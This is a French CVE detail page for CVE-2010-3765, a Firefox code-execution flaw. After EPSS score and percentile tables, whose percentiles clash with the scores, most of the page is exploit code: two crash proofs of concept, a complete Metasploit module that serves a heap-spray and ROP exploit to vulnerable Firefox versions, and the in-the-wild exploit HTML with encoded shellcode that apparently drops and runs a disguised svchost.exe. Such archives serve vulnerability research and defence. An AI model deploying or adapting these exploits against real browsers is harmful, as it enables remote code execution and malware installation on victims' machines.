CVE-2010-3765 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	83.36%	–	–
2023-03-12	–	–	–	97.02%	–
2023-04-30	–	–	–	96.81%	–
2023-06-18	–	–	–	96.97%	–
2023-08-06	–	–	–	96.98%	–
2023-10-01	–	–	–	97.13%	–
2023-11-19	–	–	–	97.06%	–
2024-02-11	–	–	–	97.03%	–
2024-03-24	–	–	–	97.09%	–
2024-06-02	–	–	–	97.09%	–
2024-06-02	–	–	–	97.09%	–
2024-06-23	–	–	–	96.73%	–
2024-08-04	–	–	–	96.95%	–
2024-09-15	–	–	–	96.94%	–
2024-11-03	–	–	–	97%	–
2024-12-22	–	–	–	94.11%	–
2025-02-02	–	–	–	94.55%	–
2025-01-19	–	–	–	94.11%	–
2025-02-02	–	–	–	94.55%	–
2025-03-18	–	–	–	–	87.35%
2025-03-30	–	–	–	–	87.77%
2025-03-30	–	–	–	–	87.77,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-30	99%
2023-06-18	1%
2023-08-06	1%
2023-10-01	1%
2023-11-19	1%
2024-02-11	1%
2024-03-24	1%
2024-06-02	1%
2024-06-02	1%
2024-06-23	1%
2024-08-04	1%
2024-09-15	1%
2024-11-03	1%
2024-12-22	99%
2025-02-02	99%
2025-01-19	99%
2025-02-02	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

Source: https://bugzilla.mozilla.org/show_bug.cgi?id=607222 <html><body> <script> function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } function crashme() { var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) { for (i = 0; i < tags.length; i++) { var atts = getatts(tags[i]); for (j = 0; j < atts.length; j++) { var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i]; document.write(html); } } } } </script> <button onclick="crashme();">Crash Me!</button> </body></html>

Hi there, For those who still do not know .. The proof of concept (that I have extracted) for CVE-2010-3765 is the following: <html><body> <script> function G(str){ var cobj=document.createElement(str); document.body.appendChild(cobj); cobj.scrollWidth; } function crashme() { document.write("fooFOO"); G("a"); document.write("<a lang></a>a"); G("base"); document.write("barBAR"); G("audio"); } </script> <script>crashme();</script> </body> </html> For more details: http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html -- http://extraexploit.blogspot.com

## # $Id: mozilla_interleaved_write.rb 11796 2011-02-22 20:49:44Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.8", :ua_maxver => "3.6.11", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }", }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox Interleaving document.write and appendChild Exploit', 'Description' => %q{ This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit. }, 'License' => MSF_LICENSE, 'Author' => [ 'unknown', # discovered in the wild 'scriptjunkie' # Metasploit module, functionality/portability fixes ], 'Version' => '$Revision: 11796 $', 'References' => [ ['CVE', '2010-3765'], ['OSVDB', '68905'], ['BID', '15352'], ['URL', 'http://www.exploit-db.com/exploits/15352/'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=607222'], ['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2010-73.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "", }, 'Targets' => [ # Tested against Firefox 3.6.8, 3.6.9, 3.6.10, and 3.6.11 on WinXP and Windows Server 2003 [ 'Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 25 2010' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) custom_js = %Q| function check(){ var temp=""; var user=navigator.userAgent.toLowerCase(); var vara=user.indexOf("windows nt 6.1"); var varb=user.indexOf("windows nt 6.0"); var varc=user.indexOf("firefox/3.6.8"); var vard=user.indexOf("firefox/3.6.9"); var vare=user.indexOf("firefox/3.6.10"); var varf=user.indexOf("firefox/3.6.11"); if(vara==-1&&varb==-1&&varc!=-1&&vard==-1&&vare==-1&&varf==-1){ temp="8"; } else if(vara==-1&&varb==-1&&varc==-1&&vard!=-1&&vare==-1&&varf==-1){ temp="9"; } else if(vara==-1&&varb==-1&&varc==-1&&vard==-1&&vare!=-1&&varf==-1){ temp="10"; } else if(vara==-1&&varb==-1&&varc==-1&&vard==-1&&vare==-1&&varf!=-1){ temp="11"; } else { return temp="0"; } return temp; } function dedede(argsu){ var i;var sunb = ""; for (i = 0; i < argsu.length; i++){ sunb += String.fromCharCode(parseInt(argsu[i], 16)); } return unescape(sunb); } function code(beastk){ var nop = ""; var len = beastk.length; for (i = 0; i < len;) { nop = nop + "m" + beastk.substring(i, i + 5); i = i + 5; } nop = nop.split("m").toString(); var temp = new Array(); for (j = 0; j < nop.length; j++) { if (nop.charCodeAt(j).toString(16) == "2c") { temp.push("25"); } else { temp.push(nop.charCodeAt(j).toString(16)); } } return dedede(temp); } function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } var chk=check(); var bk="mp.ojsyex5"; var array = new Array(); var ls = 0x100000-(bk.length*2+0x01020); var retaddr ="";//////////////////////111111111111111111111111111111 if (chk == "0") { location.href = "about:blank"; } else { if(chk=="8"){ retaddr=code("u0d0du0d0d"); } if(chk=="9"){ retaddr=code("uef52u100a"); } if(chk=="10"){ retaddr=code("ub8b7u1029"); } if(chk=="11"){ retaddr=code("u4bc8u1000"); } var ropstr = retaddr; while (ropstr.length < (0x85750 - 0x1000) / 2) { ropstr += retaddr }; ///////////////////////////////2222222222222222222 var sunb=""; var sun8inner = document.getElementById("sun8").innerHTML; var sun9inner = document.getElementById("sun9").innerHTML; var sun10inner = document.getElementById("sun10").innerHTML; var sun11inner = document.getElementById("sun11").innerHTML; var shellcodes = document.getElementById("suv").innerHTML; if(chk=="8"){ sunb=sun8inner; } if(chk=="9"){ sunb=sun9inner; } if(chk=="10"){ sunb=sun10inner; } if(chk=="11"){ sunb=sun11inner; } ropstr += code(sunb + shellcodes); for (u = 0; u < 8; u++) { retaddr += retaddr; } while (ropstr.length < ls) { ropstr += retaddr; } var lefthalf = ropstr.substring(0, ls / 2); ropstr = ""; for (i = 0; i < 0x200; i++) { array[i] = lefthalf + bk; } ////////////////////////////////////333333333333 if(chk=="8"){ retaddr=code("ub8a7u1029"); } if(chk=="9"){ retaddr=code("uab07u1006"); } if(chk=="10"){ retaddr=code("u8247u1009"); } if(chk=="11"){ retaddr=code("uf7e7u1017"); } for (i = 0; i < 16; i++) { retaddr += retaddr; } ropstr = retaddr; while (ropstr.length < ls) { ropstr += retaddr; } lefthalf = ropstr.substring(0, ls / 2); ropstr = ""; for (i = 0x200; i < 0x500; i++) { array[i] = lefthalf + bk; } var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) for (i = 0; i < tags.length; i++) { var atts = getatts(tags[i]); for (j = 0; j < atts.length; j++) { var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i]; document.write(html); } } } | opts = { 'Symbols' => { 'Variables' => %w{ atts temp vara varb varc vard vare varf argsu beastk nop tags retaddr ropstr lefthalf bk sunb shellcodes sun8inner sun9inner sun10inner sun11inner array chk }, 'Methods' => %w{ getatts code check dedede } } } custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate() return %Q| <html> <body> <div style="visibility:hidden;width:0px;height:0px"> <div id=sun8>ub8acu1029u0d00u0d0du0d00u102du1000u0d00u102du1000u8710u1018ub288u1086u127cu1004udc24u1009u102du1000u0000u0000u1000u0000u1000u0000u0040u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004u1734u1004udc24u1009</div> <div id=sun9>u2794u1000uc288u1082u3e38u1000u6cd4u100bu1016u1000u0000u0000u1000u0000u1000u0000u0040u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u6cd4u100b</div> <div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u2288u1082u428au1000u7676u1016ub8b7u1029u0000u0000u1000u0000u1000u0000u0040u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u7676u1016</div> <div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u83cau1000u0280u1083u3b5au1000u8ef4u100au4bc8u1000u0000u0000u1000u0000u1000u0000u0040u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u8ef4u100a</div> <div id=suv>#{enc_code.split("%").join}uffffuffffuffffuffff</div> </div> <body> <script type="text/javascript"> #{custom_js} </script></body></html> | end end

<!-- WARNING! This is exploit code from the wild. The original first 2 unicode chars at 'id=sun8' were ub8acu1029. Use, as always, at your own risk. <body> <div style="visibility:hidden;width:0px;height:0px"> <div id=sun8>uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002</div> <div id=sun9>uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000uef51u100au0001u0000uef51u100au0000u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001uce22u1003u57A8u0d78u5500u1001u57A8u0d78ud761u1004</div> <div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u0011u0000u1FC7u1052u0300u7FFEuFD6Du1001uA173u1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u20F0u1011u0001u0000u20F0u1011u0000u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u9405u1003u57A8u0d78u1FC7u1052u57A8u0d78uFD6Du1001</div> <div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc7u1000u0011u0000u827fu1000u0300u7FFEucda3u1000u6689u1000uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u4bc7u1000u0001u0000u4bc7u1000u0000u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000</div> <div id=suv>uEC81u0120u0000uFC8BuC783uC704u3207u9174uC70Cu0447u138EuAC0Au47C7u3908u7DE2uC783u0C47u65A0uCB97u47C7u9310uE432uC794u1447uD550uCB9Bu47C7u4318uACBEuC7DBu1C47u36B2u130Fu47C7uC420u1F8DuC774u2447u2F51u01A2u47C7u5728u0D66uC7FFu2C47u879BuE58Bu47C7uED30uFFAFuC7B4u3447u19C2u014Bu47C7u7D38uA5F0uC79Au3C47u2BE4uC594u47C7uEC40u5F9DuC7A4u4447uD680u9AAFu8DE9u0000u3300u64C0u30A1u0000u8B00u0C40u408Bu8B14u8B00u8B00u1040uE88BuF78Bu116AuE859u0027u0000uF9E2u6DEBu8B5Bu6AEEu5300u55FFu6424u00A1u0000uC700u0440u0000u0000u00C7u0000u0000u00B8u0000uFF00u51E0u8B56u3C75u748Bu782EuF503u8B56u2076uF503uC933u4149u03ADu33C5u0FDBu10BEuD63Au0874uCBC1u0307u40DAuF1EBu1F3BuE775u8B5Eu245EuDD03u8B66u4B0Cu5E8Bu031Cu8BDDu8B04uC503u5EABuC359u6EE8uFFFFuE8FFuFF8EuFFFFu6D63u2E64u7865u2065u632Fu4620u524Fu2F20u2052u2522u5355u5245u5250u464Fu4C49u2545u4C5Cu636Fu6C61u5320u7465u6974u676Eu5C73u7041u6C70u6369u7461u6F69u206Eu6144u6174u4D5Cu7A6Fu6C69u616Cu465Cu7269u6665u786Fu505Cu6F72u6966u656Cu5C73u2022u6925u4920u204Eu2A28u2029u4F44u6920u2066u7E25u697Au6520u7571u2020u3834u3436u2030u6320u646Du652Eu6578u2F20u2063u6F63u7970u2220u6925u2022u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u2022u792Fu2620u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u0022uffffuffffuffffuffff</div> </div> <body> <script src=scvhost.txt></script> <script type="text/javascript"> function check(){ var temp=""; var user=navigator.userAgent.toLowerCase(); var a=user.indexOf("windows nt 6.1"); var b=user.indexOf("windows nt 6.0"); var c=user.indexOf("firefox/3.6.8"); var d=user.indexOf("firefox/3.6.9"); var e=user.indexOf("firefox/3.6.10"); var f=user.indexOf("firefox/3.6.11"); if(a==-1&&b==-1&&c!=-1&&d==-1&&e==-1&&f==-1){ temp="8"; } else if(a==-1&&b==-1&&c==-1&&d!=-1&&e==-1&&f==-1){ temp="9"; } else if(a==-1&&b==-1&&c==-1&&d==-1&&e!=-1&&f==-1){ temp="10"; } else if(a==-1&&b==-1&&c==-1&&d==-1&&e==-1&&f!=-1){ temp="11"; } else { return temp="0"; } return temp; } function de(su){ var i;var sun = ""; for (i = 0; i < su.length; i++){ sun += String.fromCharCode(parseInt(su[i], 16)); } return unescape(sun); } function code(beastk){ var nop = ""; var len = beastk.length; for (i = 0; i < len;) { nop = nop + "m" + beastk.substring(i, i + 5); i = i + 5; } nop = nop.split("m").toString(); var temp = new Array(); for (j = 0; j < nop.length; j++) { if (nop.charCodeAt(j).toString(16) == "2c") { temp.push("25"); } else { temp.push(nop.charCodeAt(j).toString(16)); } } return de(temp); } function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } var ck=check(); var bk="mp.ojsyex5"; var array = new Array(); var ls = 0x100000-(bk.length*2+0x01020); var b1 ="";//////////////////////111111111111111111111111111111 if (ck == "0") { location.href = "about:blank"; } else { if(ck=="8"){ b1=code("u0d0du0d0d"); } if(ck=="9"){ b1=code("uef52u100a"); } if(ck=="10"){ b1=code("ub8b7u1029"); } if(ck=="11"){ b1=code("u4bc8u1000"); } var b = b1; while (b.length < (0x85750 - 0x1000) / 2) { b += b1 }; ///////////////////////////////2222222222222222222 var sun=""; var sun8 = document.getElementById("sun8").innerHTML; var sun9 = document.getElementById("sun9").innerHTML; var sun10 = document.getElementById("sun10").innerHTML; var sun11 = document.getElementById("sun11").innerHTML; var suv = document.getElementById("suv").innerHTML; if(ck=="8"){ sun=sun8; } if(ck=="9"){ sun=sun9; } if(ck=="10"){ sun=sun10; } if(ck=="11"){ sun=sun11; } b += code(sun + suv); for (u = 0; u < 8; u++) { b1 += b1; } while (b.length < ls) { b += b1; } var lh = b.substring(0, ls / 2); b = ""; for (i = 0; i < 0x200; i++) { array[i] = lh + bk; } ////////////////////////////////////333333333333 if(ck=="8"){ b1=code("ub8a7u1029"); } if(ck=="9"){ b1=code("uab07u1006"); } if(ck=="10"){ b1=code("u8247u1009"); } if(ck=="11"){ b1=code("uf7e7u1017"); } for (i = 0; i < 16; i++) { b1 += b1; } b = b1; while (b.length < ls) { b += b1; } lh = b.substring(0, ls / 2); b = ""; for (i = 0x200; i < 0x500; i++) { array[i] = lh + bk; } var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) for (i = 0; i < tags.length; i++) { var atts = getatts(tags[i]); for (j = 0; j < atts.length; j++) { var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i]; document.write(html); } } } </script>-->